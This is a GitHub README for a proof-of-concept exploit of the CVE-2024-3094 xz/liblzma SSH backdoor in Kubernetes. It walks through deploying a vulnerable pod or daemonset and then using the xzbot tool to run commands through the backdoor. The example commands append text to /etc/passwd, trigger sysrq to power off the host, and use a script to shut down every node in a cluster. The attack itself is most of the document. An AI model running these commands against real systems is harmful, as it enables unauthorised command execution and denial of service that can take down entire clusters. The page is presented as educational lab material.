Skip to content

Latest commit

 

History

History
94 lines (61 loc) · 2.76 KB

README.md

File metadata and controls

94 lines (61 loc) · 2.76 KB

CVE-2024-3094

Basic POC to test CVE-2024-3094 vulnerability inside K8s cluster

❗ DISCLAIMER ❗

USE ONLY FOR EDUCATIONAL PURPOSES THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE CAUSED BY THE USE OF THIS SOFTWARE

Description

We will deploy a vulnerable pod and exploit it to execute commands inside that vulnerable pods, we do inside the same network for security reasons. We don't expossed the vulnerable pod to the internet, but is the same concept.

That vulnerability allows to execute commands inside the pod, even if the pod is running whit security context, you can for ex shutdown the host that is running the pod.

If that vulnerability is running in a single pod, you can shutdown the host, making temporal unavailable all the services running in that host. But, if the vulnerability is running as a deamonset, you can shutdown all the hosts that are running that deamonset, even shutdown the whole cluster.

Requirements

  • K8s cluster deployed
  • Kubectl installed
  • Access to the K8s cluster
  • Go installed

Usage

First, install xzbots in the cluster

go install github.com/amlweems/xzbot@latest

Download the repo and deploy the vulnerable deployment/daemonset

git clone https://github.com/shefirot/CVE-2024-3094.git
cd CVE-2024-3094
# Deployment
kubectl apply -f deploy_cve-2024-3094.yml
# Or daemonset
kubectl apply -f daemonset_cve-2024-3094.yml
# Get the pod name
kubectl -n vulnes get pods

# Port forward the pod
kubectl -n vulnes port-forward <pod-name> 2225:22

# Execute command, for example write in /etc/passwd
$HOME/go/bin/xzbot -addr 127.0.0.1:2225 -cmd 'echo "David estuvo aqui" >> /etc/passwd'

# Check the /etc/passwd file
kubectl -n vulnes exec <pod-name> -- /usr/bin/cat /etc/passwd

Go forward and shutdown the host

# Enable sysrq
$HOME/go/bin/xzbot -addr 127.0.0.1:2225 -cmd 'echo 1 > /proc/sys/kernel/sysrq'

# Shutdown the host
$HOME/go/bin/xzbot -addr 127.0.0.1:2225 -cmd 'echo o > /proc/sysrq-trigger'

You can also shutdown all the hosts that are running the daemonset

source shutdown_nodes.sh

Known issues

1. Connection refused

When you execute the loop to shutdown all the hosts, if you receive this error:

2024/06/11 12:08:58 dial tcp 127.0.0.1:2225: connect: connection refused

Give more time to the port forward to be ready, you can increase the sleep time in the loop.

Extra info

The container image ussed was generated whit the dockerfile in the repo, you can generate the image and push it to your registry.

To generate liblzma.so.5.6.0.patch library, you can use the following the amlweems repo that is in the references.

References

amlweems repo

r0binak repo